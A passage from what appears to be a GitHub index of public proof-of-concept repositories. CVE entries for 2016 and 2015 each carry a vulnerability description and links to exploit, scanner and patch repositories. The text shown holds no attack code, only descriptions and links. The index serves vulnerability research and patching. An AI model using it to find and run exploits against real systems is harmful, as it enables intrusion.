- [r00t4dm/Jenkins-CVE-2016-9299](https://github.com/r00t4dm/Jenkins-CVE-2016-9299)
### CVE-2016-9795 (2017-01-27)
The casrvc program in CA Common Services, as used in CA Client Automation 12.8, 12.9, and 14.0; CA SystemEDGE 5.8.2 and 5.9; CA Systems Performance for Infrastructure Managers 12.8 and 12.9; CA Universal Job Management Agent 11.2; CA Virtual Assurance for Infrastructure Managers 12.8 and 12.9; CA Workload Automation AE 11, 11.3, 11.3.5, and 11.3.6 on AIX, HP-UX, Linux, and Solaris allows local users to modify arbitrary files and consequently gain root privileges via vectors related to insufficient validation.
- [blogresponder/CA-Common-Services-privilege-escalation-cve-2016-9795-revisited](https://github.com/blogresponder/CA-Common-Services-privilege-escalation-cve-2016-9795-revisited)
### CVE-2016-9838 (2016-12-16)
An issue was discovered in components/com_users/models/registration.php in Joomla! before 3.6.5. Incorrect filtering of registration form data stored to the session on a validation error enables a user to gain access to a registered user's account and reset the user's group mappings, username, and password, as demonstrated by submitting a form that targets the `registration.register` task.
- [cved-sources/cve-2016-9838](https://github.com/cved-sources/cve-2016-9838)
### CVE-2016-9920 (2016-12-08)
steps/mail/sendmail.inc in Roundcube before 1.1.7 and 1.2.x before 1.2.3, when no SMTP server is configured and the sendmail program is enabled, does not properly restrict the use of custom envelope-from addresses on the sendmail command line, which allows remote authenticated users to execute arbitrary code via a modified HTTP request that sends a crafted e-mail message.
- [t0kx/exploit-CVE-2016-9920](https://github.com/t0kx/exploit-CVE-2016-9920)
### CVE-2016-10006 (2016-12-24)
In OWASP AntiSamy before 1.5.5, by submitting a specially crafted input (a tag that supports style with active content), you could bypass the library protections and supply executable code. The impact is XSS.
- [epicosy/VUL4J-60](https://github.com/epicosy/VUL4J-60)
### CVE-2016-10033 (2016-12-30)
The mailSend function in the isMail transport in PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a \" (backslash double quote) in a crafted Sender property.
- [opsxcq/exploit-CVE-2016-10033](https://github.com/opsxcq/exploit-CVE-2016-10033)
- [Zenexer/safeshell](https://github.com/Zenexer/safeshell)
- [GeneralTesler/CVE-2016-10033](https://github.com/GeneralTesler/CVE-2016-10033)
- [chipironcin/CVE-2016-10033](https://github.com/chipironcin/CVE-2016-10033)
- [Bajunan/CVE-2016-10033](https://github.com/Bajunan/CVE-2016-10033)
- [qwertyuiop12138/CVE-2016-10033](https://github.com/qwertyuiop12138/CVE-2016-10033)
- [liusec/WP-CVE-2016-10033](https://github.com/liusec/WP-CVE-2016-10033)
- [pedro823/cve-2016-10033-45](https://github.com/pedro823/cve-2016-10033-45)
- [awidardi/opsxcq-cve-2016-10033](https://github.com/awidardi/opsxcq-cve-2016-10033)
- [0x00-0x00/CVE-2016-10033](https://github.com/0x00-0x00/CVE-2016-10033)
- [cved-sources/cve-2016-10033](https://github.com/cved-sources/cve-2016-10033)
- [j4k0m/CVE-2016-10033](https://github.com/j4k0m/CVE-2016-10033)
- [zeeshanbhattined/exploit-CVE-2016-10033](https://github.com/zeeshanbhattined/exploit-CVE-2016-10033)
- [CAOlvchonger/CVE-2016-10033](https://github.com/CAOlvchonger/CVE-2016-10033)
- [eb613819/CTF_CVE-2016-10033](https://github.com/eb613819/CTF_CVE-2016-10033)
- [ElnurBDa/CVE-2016-10033](https://github.com/ElnurBDa/CVE-2016-10033)
- [Astrowmist/POC-CVE-2016-10033](https://github.com/Astrowmist/POC-CVE-2016-10033)
### CVE-2016-10034 (2016-12-30)
The setFrom function in the Sendmail adapter in the zend-mail component before 2.4.11, 2.5.x, 2.6.x, and 2.7.x before 2.7.2, and Zend Framework before 2.4.11 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a \" (backslash double quote) in a crafted e-mail address.
- [heikipikker/exploit-CVE-2016-10034](https://github.com/heikipikker/exploit-CVE-2016-10034)
### CVE-2016-10140 (2017-01-13)
Information disclosure and authentication bypass vulnerability exists in the Apache HTTP Server configuration bundled with ZoneMinder v1.30 and v1.29, which allows a remote unauthenticated attacker to browse all directories in the web root, e.g., a remote unauthenticated attacker can view all CCTV images on the server via the /events URI.
- [asaotomo/CVE-2016-10140-Zoneminder-Poc](https://github.com/asaotomo/CVE-2016-10140-Zoneminder-Poc)
### CVE-2016-10190 (2017-02-09)
Heap-based buffer overflow in libavformat/http.c in FFmpeg before 2.8.10, 3.0.x before 3.0.5, 3.1.x before 3.1.6, and 3.2.x before 3.2.2 allows remote web servers to execute arbitrary code via a negative chunk size in an HTTP response.
- [muzalam/FFMPEG-exploit](https://github.com/muzalam/FFMPEG-exploit)
### CVE-2016-10191 (2017-02-09)
Heap-based buffer overflow in libavformat/rtmppkt.c in FFmpeg before 2.8.10, 3.0.x before 3.0.5, 3.1.x before 3.1.6, and 3.2.x before 3.2.2 allows remote attackers to execute arbitrary code by leveraging failure to check for RTMP packet size mismatches.
- [KaviDk/Heap-Over-Flow-with-CVE-2016-10191](https://github.com/KaviDk/Heap-Over-Flow-with-CVE-2016-10191)
### CVE-2016-10277 (2017-05-12)
An elevation of privilege vulnerability in the Motorola bootloader could enable a local malicious application to execute arbitrary code within the context of the bootloader. This issue is rated as Critical due to the possibility of a local permanent device compromise, which may require reflashing the operating system to repair the device. Product: Android. Versions: Kernel-3.10, Kernel-3.18. Android ID: A-33840490.
- [alephsecurity/initroot](https://github.com/alephsecurity/initroot)
- [leosol/initroot](https://github.com/leosol/initroot)
### CVE-2016-10555 (2018-05-31)
Since "algorithm" isn't enforced in jwt.decode()in jwt-simple 0.3.0 and earlier, a malicious user could choose what algorithm is sent sent to the server. If the server is expecting RSA but is sent HMAC-SHA with RSA's public key, the server will think the public key is actually an HMAC private key. This could be used to forge any data an attacker wants.
- [thepcn3rd/jwtToken-CVE-2016-10555](https://github.com/thepcn3rd/jwtToken-CVE-2016-10555)
- [CircuitSoul/poc-cve-2016-10555](https://github.com/CircuitSoul/poc-cve-2016-10555)
- [scent2d/PoC-CVE-2016-10555](https://github.com/scent2d/PoC-CVE-2016-10555)
### CVE-2016-10709 (2018-01-22)
pfSense before 2.3 allows remote authenticated users to execute arbitrary OS commands via a '|' character in the status_rrd_graph_img.php graph parameter, related to _rrd_graph_img.php.
- [wetw0rk/Exploit-Development](https://github.com/wetw0rk/Exploit-Development)
### CVE-2016-10761 (2019-06-29)
Logitech Unifying devices before 2016-02-26 allow keystroke injection, bypassing encryption, aka MouseJack.
- [ISSAPolska/CVE-2016-10761](https://github.com/ISSAPolska/CVE-2016-10761)
### CVE-2016-10924 (2019-08-22)
The ebook-download plugin before 1.2 for WordPress has directory traversal.
- [rvizx/CVE-2016-10924](https://github.com/rvizx/CVE-2016-10924)
- [LGenAgul/Wordpress-ebook-CVE-2016-10924](https://github.com/LGenAgul/Wordpress-ebook-CVE-2016-10924)
### CVE-2016-10956 (2019-09-16)
The mail-masta plugin 1.0 for WordPress has local file inclusion in count_of_send.php and csvexport.php.
- [p0dalirius/CVE-2016-10956-mail-masta](https://github.com/p0dalirius/CVE-2016-10956-mail-masta)
- [Hackhoven/wp-mail-masta-exploit](https://github.com/Hackhoven/wp-mail-masta-exploit)
### CVE-2016-10993 (2019-09-17)
The ScoreMe theme through 2016-04-01 for WordPress has XSS via the s parameter.
- [0xc4t/CVE-2016-10993](https://github.com/0xc4t/CVE-2016-10993)
### CVE-2016-20012 (2021-09-15)
OpenSSH through 8.7 allows remote attackers, who have a suspicion that a certain combination of username and public key is known to an SSH server, to test whether this suspicion is correct. This occurs because a challenge is sent only when that combination could be valid for a login session. NOTE: the vendor does not recognize user enumeration as a vulnerability for this product
- [aztec-eagle/cve-2016-20012](https://github.com/aztec-eagle/cve-2016-20012)
### CVE-2016-1000027 (2020-01-02)
Pivotal Spring Framework through 5.3.16 suffers from a potential remote code execution (RCE) issue if used for Java deserialization of untrusted data. Depending on how the library is implemented within a product, this issue may or not occur, and authentication may be required. NOTE: the vendor's position is that untrusted data is not an intended use case. The product's behavior will not be changed because some users rely on deserialization of trusted data.
- [artem-smotrakov/cve-2016-1000027-poc](https://github.com/artem-smotrakov/cve-2016-1000027-poc)
- [tina94happy/Spring-Web-5xx-Mitigated-version](https://github.com/tina94happy/Spring-Web-5xx-Mitigated-version)
- [yihtserns/spring-web-without-remoting](https://github.com/yihtserns/spring-web-without-remoting)
## 2015
### CVE-2015-0006 (2015-01-13)
The Network Location Awareness (NLA) service in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 does not perform mutual authentication to determine a domain connection, which allows remote attackers to trigger an unintended permissive configuration by spoofing DNS and LDAP responses on a local network, aka "NLA Security Feature Bypass Vulnerability."
- [bugch3ck/imposter](https://github.com/bugch3ck/imposter)
### CVE-2015-0057 (2015-02-11)
win32k.sys in the kernel-mode drivers in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows local users to gain privileges via a crafted application, aka "Win32k Elevation of Privilege Vulnerability."
- [55-AA/CVE-2015-0057](https://github.com/55-AA/CVE-2015-0057)
### CVE-2015-0072 (2015-02-07)
Cross-site scripting (XSS) vulnerability in Microsoft Internet Explorer 9 through 11 allows remote attackers to bypass the Same Origin Policy and inject arbitrary web script or HTML via vectors involving an IFRAME element that triggers a redirect, a second IFRAME element that does not trigger a redirect, and an eval of a WindowProxy object, aka "Universal XSS (UXSS)."
- [dbellavista/uxss-poc](https://github.com/dbellavista/uxss-poc)
### CVE-2015-0204 (2015-01-09)
The ssl3_get_key_exchange function in s3_clnt.c in OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k allows remote SSL servers to conduct RSA-to-EXPORT_RSA downgrade attacks and facilitate brute-force decryption by offering a weak ephemeral RSA key in a noncompliant role, related to the "FREAK" issue. NOTE: the scope of this CVE is only client code based on OpenSSL, not EXPORT_RSA issues associated with servers or other TLS implementations.
- [felmoltor/FreakVulnChecker](https://github.com/felmoltor/FreakVulnChecker)
- [scottjpack/Freak-Scanner](https://github.com/scottjpack/Freak-Scanner)
- [AbhishekGhosh/FREAK-Attack-CVE-2015-0204-Testing-Script](https://github.com/AbhishekGhosh/FREAK-Attack-CVE-2015-0204-Testing-Script)
- [niccoX/patch-openssl-CVE-2014-0291_CVE-2015-0204](https://github.com/niccoX/patch-openssl-CVE-2014-0291_CVE-2015-0204)
- [anthophilee/A2SV--SSL-VUL-Scan](https://github.com/anthophilee/A2SV--SSL-VUL-Scan)
### CVE-2015-0205 (2015-01-09)
The ssl3_get_cert_verify function in s3_srvr.c in OpenSSL 1.0.0 before 1.0.0p and 1.0.1 before 1.0.1k accepts client authentication with a Diffie-Hellman (DH) certificate without requiring a CertificateVerify message, which allows remote attackers to obtain access without knowledge of a private key via crafted TLS Handshake Protocol traffic to a server that recognizes a Certification Authority with DH support.
- [saurabh2088/OpenSSL_1_0_1g_CVE-2015-0205](https://github.com/saurabh2088/OpenSSL_1_0_1g_CVE-2015-0205)
### CVE-2015-0231 (2015-01-27)
Use-after-free vulnerability in the process_nested_data function in ext/standard/var_unserializer.re in PHP before 5.4.37, 5.5.x before 5.5.21, and 5.6.x before 5.6.5 allows remote attackers to execute arbitrary code via a crafted unserialize call that leverages improper handling of duplicate numerical keys within the serialized properties of an object. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-8142.
- [3xp10it/php_cve-2014-8142_cve-2015-0231](https://github.com/3xp10it/php_cve-2014-8142_cve-2015-0231)
### CVE-2015-0235 (2015-01-28)
Heap-based buffer overflow in the __nss_hostname_digits_dots function in glibc 2.2, and other 2.x versions before 2.18, allows context-dependent attackers to execute arbitrary code via vectors related to the (1) gethostbyname or (2) gethostbyname2 function, aka "GHOST."
- [fser/ghost-checker](https://github.com/fser/ghost-checker)
- [mikesplain/CVE-2015-0235-cookbook](https://github.com/mikesplain/CVE-2015-0235-cookbook)
- [aaronfay/CVE-2015-0235-test](https://github.com/aaronfay/CVE-2015-0235-test)
- [piyokango/ghost](https://github.com/piyokango/ghost)
- [mholzinger/CVE-2015-0235_GHOST](https://github.com/mholzinger/CVE-2015-0235_GHOST)
- [adherzog/ansible-CVE-2015-0235-GHOST](https://github.com/adherzog/ansible-CVE-2015-0235-GHOST)
- [favoretti/lenny-libc6](https://github.com/favoretti/lenny-libc6)
- [nickanderson/cfengine-CVE_2015_0235](https://github.com/nickanderson/cfengine-CVE_2015_0235)
- [koudaiii-archives/cookbook-update-glibc](https://github.com/koudaiii-archives/cookbook-update-glibc)
- [F88/ghostbusters15](https://github.com/F88/ghostbusters15)
- [tobyzxj/CVE-2015-0235](https://github.com/tobyzxj/CVE-2015-0235)
- [makelinux/CVE-2015-0235-workaround](https://github.com/makelinux/CVE-2015-0235-workaround)
- [arm13/ghost_exploit](https://github.com/arm13/ghost_exploit)
- [alanmeyer/CVE-glibc](https://github.com/alanmeyer/CVE-glibc)
- [1and1-serversupport/ghosttester](https://github.com/1and1-serversupport/ghosttester)
- [sUbc0ol/CVE-2015-0235](https://github.com/sUbc0ol/CVE-2015-0235)
- [chayim/GHOSTCHECK-cve-2015-0235](https://github.com/chayim/GHOSTCHECK-cve-2015-0235)
- [limkokholefork/GHOSTCHECK-cve-2015-0235](https://github.com/limkokholefork/GHOSTCHECK-cve-2015-0235)
### CVE-2015-0311 (2015-01-23)
Unspecified vulnerability in Adobe Flash Player through 13.0.0.262 and 14.x, 15.x, and 16.x through 16.0.0.287 on Windows and OS X and through 11.2.202.438 on Linux allows remote attackers to execute arbitrary code via unknown vectors, as exploited in the wild in January 2015.
- [jr64/CVE-2015-0311](https://github.com/jr64/CVE-2015-0311)
### CVE-2015-0313 (2015-02-02)
Use-after-free vulnerability in Adobe Flash Player before 13.0.0.269 and 14.x through 16.x before 16.0.0.305 on Windows and OS X and before 11.2.202.442 on Linux allows remote attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in February 2015, a different vulnerability than CVE-2015-0315, CVE-2015-0320, and CVE-2015-0322.
- [SecurityObscurity/cve-2015-0313](https://github.com/SecurityObscurity/cve-2015-0313)
### CVE-2015-0345 (2015-04-15)
Cross-site scripting (XSS) vulnerability in Adobe ColdFusion 10 before Update 16 and 11 before Update 5 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
- [BishopFox/coldfusion-10-11-xss](https://github.com/BishopFox/coldfusion-10-11-xss)
### CVE-2015-0568 (2016-08-07)
Use-after-free vulnerability in the msm_set_crop function in drivers/media/video/msm/msm_camera.c in the MSM-Camera driver for the Linux kernel 3.x, as used in Qualcomm Innovation Center (QuIC) Android contributions for MSM devices and other products, allows attackers to gain privileges or cause a denial of service (memory corruption) via an application that makes a crafted ioctl call.
- [betalphafai/CVE-2015-0568](https://github.com/betalphafai/CVE-2015-0568)
### CVE-2015-0816 (2015-04-01)
Mozilla Firefox before 37.0, Firefox ESR 31.x before 31.6, and Thunderbird before 31.6 do not properly restrict resource: URLs, which makes it easier for remote attackers to execute arbitrary JavaScript code with chrome privileges by leveraging the ability to bypass the Same Origin Policy, as demonstrated by the resource: URL associated with PDF.js.
- [Afudadi/Firefox-35-37-Exploit](https://github.com/Afudadi/Firefox-35-37-Exploit)
### CVE-2015-1130 (2015-04-10)
The XPC implementation in Admin Framework in Apple OS X before 10.10.3 allows local users to bypass authentication and obtain admin privileges via unspecified vectors.
- [Shmoopi/RootPipe-Demo](https://github.com/Shmoopi/RootPipe-Demo)
- [sideeffect42/RootPipeTester](https://github.com/sideeffect42/RootPipeTester)
### CVE-2015-1140 (2015-04-10)
Buffer overflow in IOHIDFamily in Apple OS X before 10.10.3 allows local users to gain privileges via unspecified vectors.
- [kpwn/vpwn](https://github.com/kpwn/vpwn)
### CVE-2015-1157 (2015-05-28)
CoreText in Apple iOS 8.x through 8.3 allows remote attackers to cause a denial of service (reboot and messaging disruption) via crafted Unicode text that is not properly handled during display truncation in the Notifications feature, as demonstrated by Arabic characters in (1) an SMS message or (2) a WhatsApp message.
- [perillamint/CVE-2015-1157](https://github.com/perillamint/CVE-2015-1157)
### CVE-2015-1318 (2015-04-17)
The crash reporting feature in Apport 2.13 through 2.17.x before 2.17.1 allows local users to gain privileges via a crafted usr/share/apport/apport file in a namespace (container).
- [ScottyBauer/CVE-2015-1318](https://github.com/ScottyBauer/CVE-2015-1318)
### CVE-2015-1328 (2016-11-28)
The overlayfs implementation in the linux (aka Linux kernel) package before 3.19.0-21.21 in Ubuntu through 15.04 does not properly check permissions for file creation in the upper filesystem directory, which allows local users to obtain root access by leveraging a configuration in which overlayfs is permitted in an arbitrary mount namespace.
- [SR7-HACKING/LINUX-VULNERABILITY-CVE-2015-1328](https://github.com/SR7-HACKING/LINUX-VULNERABILITY-CVE-2015-1328)
- [notlikethis/CVE-2015-1328](https://github.com/notlikethis/CVE-2015-1328)
- [elit3pwner/CVE-2015-1328-GoldenEye](https://github.com/elit3pwner/CVE-2015-1328-GoldenEye)
- [BlackFrog-hub/cve-2015-1328](https://github.com/BlackFrog-hub/cve-2015-1328)
### CVE-2015-1397 (2015-04-29)
SQL injection vulnerability in the getCsvFile function in the Mage_Adminhtml_Block_Widget_Grid class in Magento Community Edition (CE) 1.9.1.0 and Enterprise Edition (EE) 1.14.1.0 allows remote administrators to execute arbitrary SQL commands via the popularity[field_expr] parameter when the popularity[from] or popularity[to] parameter is set.
- [tmatejicek/CVE-2015-1397](https://github.com/tmatejicek/CVE-2015-1397)
- [WHOISshuvam/CVE-2015-1397](https://github.com/WHOISshuvam/CVE-2015-1397)
- [Wytchwulf/CVE-2015-1397-Magento-Shoplift](https://github.com/Wytchwulf/CVE-2015-1397-Magento-Shoplift)
### CVE-2015-1427 (2015-02-17)
The Groovy scripting engine in Elasticsearch before 1.3.8 and 1.4.x before 1.4.3 allows remote attackers to bypass the sandbox protection mechanism and execute arbitrary shell commands via a crafted script.
- [t0kx/exploit-CVE-2015-1427](https://github.com/t0kx/exploit-CVE-2015-1427)
- [cved-sources/cve-2015-1427](https://github.com/cved-sources/cve-2015-1427)
- [cyberharsh/Groovy-scripting-engine-CVE-2015-1427](https://github.com/cyberharsh/Groovy-scripting-engine-CVE-2015-1427)
- [xpgdgit/CVE-2015-1427](https://github.com/xpgdgit/CVE-2015-1427)
### CVE-2015-1474 (2015-02-16)
Multiple integer overflows in the GraphicBuffer::unflatten function in platform/frameworks/native/libs/ui/GraphicBuffer.cpp in Android through 5.0 allow attackers to gain privileges or cause a denial of service (memory corruption) via vectors that trigger a large number of (1) file descriptors or (2) integer values.
- [p1gl3t/CVE-2015-1474_poc](https://github.com/p1gl3t/CVE-2015-1474_poc)
### CVE-2015-1528 (2015-10-01)
Integer overflow in the native_handle_create function in libcutils/native_handle.c in Android before 5.1.1 LMY48M allows attackers to obtain a different application's privileges or cause a denial of service (Binder heap memory corruption) via a crafted application, aka internal bug 19334482.
- [secmob/PoCForCVE-2015-1528](https://github.com/secmob/PoCForCVE-2015-1528)
- [kanpol/PoCForCVE-2015-1528](https://github.com/kanpol/PoCForCVE-2015-1528)
### CVE-2015-1538 (2015-10-01)
Integer overflow in the SampleTable::setSampleToChunkParams function in SampleTable.cpp in libstagefright in Android before 5.1.1 LMY48I allows remote attackers to execute arbitrary code via crafted atoms in MP4 data that trigger an unchecked multiplication, aka internal bug 20139950, a related issue to CVE-2015-4496.
- [oguzhantopgul/cve-2015-1538-1](https://github.com/oguzhantopgul/cve-2015-1538-1)
- [renjithsasidharan/cve-2015-1538-1](https://github.com/renjithsasidharan/cve-2015-1538-1)
- [jduck/cve-2015-1538-1](https://github.com/jduck/cve-2015-1538-1)
- [niranjanshr13/Stagefright-cve-2015-1538-1](https://github.com/niranjanshr13/Stagefright-cve-2015-1538-1)
- [Tharana/Android-vulnerability-exploitation](https://github.com/Tharana/Android-vulnerability-exploitation)
- [Tharana/vulnerability-exploitation](https://github.com/Tharana/vulnerability-exploitation)
### CVE-2015-1560 (2015-07-14)
SQL injection vulnerability in the isUserAdmin function in include/common/common-Func.php in Centreon (formerly Merethis Centreon) 2.5.4 and earlier (fixed in Centreon web 2.7.0) allows remote attackers to execute arbitrary SQL commands via the sid parameter to include/common/XmlTree/GetXmlTree.php.
- [Iansus/Centreon-CVE-2015-1560_1561](https://github.com/Iansus/Centreon-CVE-2015-1560_1561)
### CVE-2015-1578 (2015-02-11)
Multiple open redirect vulnerabilities in u5CMS before 3.9.4 allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the (1) pidvesa cookie to u5admin/pidvesa.php or (2) uri parameter to u5admin/meta2.php.
- [Zeppperoni/CVE-2015-1578](https://github.com/Zeppperoni/CVE-2015-1578)
### CVE-2015-1579 (2015-02-11)
Directory traversal vulnerability in the Elegant Themes Divi theme for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the img parameter in a revslider_show_image action to wp-admin/admin-ajax.php. NOTE: this vulnerability may be a duplicate of CVE-2014-9734.
- [paralelo14/WordPressMassExploiter](https://github.com/paralelo14/WordPressMassExploiter)
- [paralelo14/CVE-2015-1579](https://github.com/paralelo14/CVE-2015-1579)
### CVE-2015-1592 (2015-02-19)
Movable Type Pro, Open Source, and Advanced before 5.2.12 and Pro and Advanced 6.0.x before 6.0.7 does not properly use the Perl Storable::thaw function, which allows remote attackers to include and execute arbitrary local Perl files and possibly execute arbitrary code via unspecified vectors.
- [lightsey/cve-2015-1592](https://github.com/lightsey/cve-2015-1592)
### CVE-2015-1635 (2015-04-14)
HTTP.sys in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 allows remote attackers to execute arbitrary code via crafted HTTP requests, aka "HTTP.sys Remote Code Execution Vulnerability."
- [xPaw/HTTPsys](https://github.com/xPaw/HTTPsys)
- [Zx7ffa4512-Python/Project-CVE-2015-1635](https://github.com/Zx7ffa4512-Python/Project-CVE-2015-1635)
- [technion/erlvulnscan](https://github.com/technion/erlvulnscan)
- [wiredaem0n/chk-ms15-034](https://github.com/wiredaem0n/chk-ms15-034)
- [u0pattern/Remove-IIS-RIIS](https://github.com/u0pattern/Remove-IIS-RIIS)
- [bongbongco/MS15-034](https://github.com/bongbongco/MS15-034)
- [aedoo/CVE-2015-1635-POC](https://github.com/aedoo/CVE-2015-1635-POC)
- [limkokholefork/CVE-2015-1635](https://github.com/limkokholefork/CVE-2015-1635)
- [h3xcr4ck3r/CVE-2015-1635-POC](https://github.com/h3xcr4ck3r/CVE-2015-1635-POC)
- [h3xcr4ck3r/CVE-2015-1635](https://github.com/h3xcr4ck3r/CVE-2015-1635)
- [w01ke/CVE-2015-1635-POC](https://github.com/w01ke/CVE-2015-1635-POC)
- [SkinAir/ms15-034-Scan](https://github.com/SkinAir/ms15-034-Scan)
- [Cappricio-Securities/CVE-2015-1635](https://github.com/Cappricio-Securities/CVE-2015-1635)
### CVE-2015-1641 (2015-04-14)
Microsoft Word 2007 SP3, Office 2010 SP2, Word 2010 SP2, Word 2013 SP1, Word 2013 RT SP1, Word for Mac 2011, Office Compatibility Pack SP3, Word Automation Services on SharePoint Server 2010 SP2 and 2013 SP1, and Office Web Apps Server 2010 SP2 and 2013 SP1 allow remote attackers to execute arbitrary code via a crafted RTF document, aka "Microsoft Office Memory Corruption Vulnerability."
- [Cyberclues/rtf_exploit_extractor](https://github.com/Cyberclues/rtf_exploit_extractor)
### CVE-2015-1701 (2015-04-21)
Win32k.sys in the kernel-mode drivers in Microsoft Windows Server 2003 SP2, Vista SP2, and Server 2008 SP2 allows local users to gain privileges via a crafted application, as exploited in the wild in April 2015, aka "Win32k Elevation of Privilege Vulnerability."
- [hfiref0x/CVE-2015-1701](https://github.com/hfiref0x/CVE-2015-1701)
- [Anonymous-Family/CVE-2015-1701](https://github.com/Anonymous-Family/CVE-2015-1701)
- [Anonymous-Family/CVE-2015-1701-download](https://github.com/Anonymous-Family/CVE-2015-1701-download)
### CVE-2015-1769 (2015-08-15)
Mount Manager in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT Gold and 8.1, and Windows 10 mishandles symlinks, which allows physically proximate attackers to execute arbitrary code by connecting a crafted USB device, aka "Mount Manager Elevation of Privilege Vulnerability."
- [int0/CVE-2015-1769](https://github.com/int0/CVE-2015-1769)
### CVE-2015-1788 (2015-06-12)
The BN_GF2m_mod_inv function in crypto/bn/bn_gf2m.c in OpenSSL before 0.9.8s, 1.0.0 before 1.0.0e, 1.0.1 before 1.0.1n, and 1.0.2 before 1.0.2b does not properly handle ECParameters structures in which the curve is over a malformed binary polynomial field, which allows remote attackers to cause a denial of service (infinite loop) via a session that uses an Elliptic Curve algorithm, as demonstrated by an attack against a server that supports client authentication.
- [pazhanivel07/OpenSSL_1_0_1g_CVE-2015-1788](https://github.com/pazhanivel07/OpenSSL_1_0_1g_CVE-2015-1788)
### CVE-2015-1790 (2015-06-12)
The PKCS7_dataDecodefunction in crypto/pkcs7/pk7_doit.c in OpenSSL before 0.9.8zg, 1.0.0 before 1.0.0s, 1.0.1 before 1.0.1n, and 1.0.2 before 1.0.2b allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a PKCS#7 blob that uses ASN.1 encoding and lacks inner EncryptedContent data.
- [Trinadh465/OpenSSL-1_0_1g_CVE-2015-1790](https://github.com/Trinadh465/OpenSSL-1_0_1g_CVE-2015-1790)
### CVE-2015-1791 (2015-06-12)
Race condition in the ssl3_get_new_session_ticket function in ssl/s3_clnt.c in OpenSSL before 0.9.8zg, 1.0.0 before 1.0.0s, 1.0.1 before 1.0.1n, and 1.0.2 before 1.0.2b, when used for a multi-threaded client, allows remote attackers to cause a denial of service (double free and application crash) or possibly have unspecified other impact by providing a NewSessionTicket during an attempt to reuse a ticket that had been obtained earlier.
- [Trinadh465/OpenSSL-1_0_1g_CVE-2015-1791](https://github.com/Trinadh465/OpenSSL-1_0_1g_CVE-2015-1791)
### CVE-2015-1792 (2015-06-12)
The do_free_upto function in crypto/cms/cms_smime.c in OpenSSL before 0.9.8zg, 1.0.0 before 1.0.0s, 1.0.1 before 1.0.1n, and 1.0.2 before 1.0.2b allows remote attackers to cause a denial of service (infinite loop) via vectors that trigger a NULL value of a BIO data structure, as demonstrated by an unrecognized X.660 OID for a hash function.
- [Trinadh465/OpenSSL-1_0_1g_CVE-2015-1792](https://github.com/Trinadh465/OpenSSL-1_0_1g_CVE-2015-1792)
### CVE-2015-1805 (2015-08-08)
The (1) pipe_read and (2) pipe_write implementations in fs/pipe.c in the Linux kernel before 3.16 do not properly consider the side effects of failed __copy_to_user_inatomic and __copy_from_user_inatomic calls, which allows local users to cause a denial of service (system crash) or possibly gain privileges via a crafted application, aka an "I/O vector array overrun."
- [panyu6325/CVE-2015-1805](https://github.com/panyu6325/CVE-2015-1805)
- [dosomder/iovyroot](https://github.com/dosomder/iovyroot)
- [FloatingGuy/cve-2015-1805](https://github.com/FloatingGuy/cve-2015-1805)
- [mobilelinux/iovy_root_research](https://github.com/mobilelinux/iovy_root_research)
- [ireshchaminda1/Android-Privilege-Escalation-Remote-Access-Vulnerability-CVE-2015-1805](https://github.com/ireshchaminda1/Android-Privilege-Escalation-Remote-Access-Vulnerability-CVE-2015-1805)
### CVE-2015-1855 (2019-11-29)
verify_certificate_identity in the OpenSSL extension in Ruby before 2.0.0 patchlevel 645, 2.1.x before 2.1.6, and 2.2.x before 2.2.2 does not properly validate hostnames, which allows remote attackers to spoof servers via vectors related to (1) multiple wildcards, (1) wildcards in IDNA names, (3) case sensitivity, and (4) non-ASCII characters.
- [vpereira/CVE-2015-1855](https://github.com/vpereira/CVE-2015-1855)
### CVE-2015-1986 (2015-06-30)
The server in IBM Tivoli Storage Manager FastBack 6.1 before 6.1.12 allows remote attackers to execute arbitrary commands via unspecified vectors, a different vulnerability than CVE-2015-1938.
- [3t3rn4lv01d/CVE-2015-1986](https://github.com/3t3rn4lv01d/CVE-2015-1986)
### CVE-2015-2153 (2015-03-24)
The rpki_rtr_pdu_print function in print-rpki-rtr.c in the TCP printer in tcpdump before 4.7.2 allows remote attackers to cause a denial of service (out-of-bounds read or write and crash) via a crafted header length in an RPKI-RTR Protocol Data Unit (PDU).
- [arntsonl/CVE-2015-2153](https://github.com/arntsonl/CVE-2015-2153)
### CVE-2015-2166 (2015-04-06)
Directory traversal vulnerability in the Instance Monitor in Ericsson Drutt Mobile Service Delivery Platform (MSDP) 4, 5, and 6 allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the default URI.
- [K3ysTr0K3R/CVE-2015-2166-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2015-2166-EXPLOIT)
### CVE-2015-2208 (2015-03-12)
The saveObject function in moadmin.php in phpMoAdmin 1.1.2 allows remote attackers to execute arbitrary commands via shell metacharacters in the object parameter.
- [ptantiku/cve-2015-2208](https://github.com/ptantiku/cve-2015-2208)
### CVE-2015-2231
- [rednaga/adups-get-super-serial](https://github.com/rednaga/adups-get-super-serial)
### CVE-2015-2291 (2017-08-09)
(1) IQVW32.sys before 1.3.1.0 and (2) IQVW64.sys before 1.3.1.0 in the Intel Ethernet diagnostics driver for Windows allows local users to cause a denial of service or possibly execute arbitrary code with kernel privileges via a crafted (a) 0x80862013, (b) 0x8086200B, (c) 0x8086200F, or (d) 0x80862007 IOCTL call.
- [Tare05/Intel-CVE-2015-2291](https://github.com/Tare05/Intel-CVE-2015-2291)
- [gmh5225/CVE-2015-2291](https://github.com/gmh5225/CVE-2015-2291)
### CVE-2015-2315 (2015-03-17)
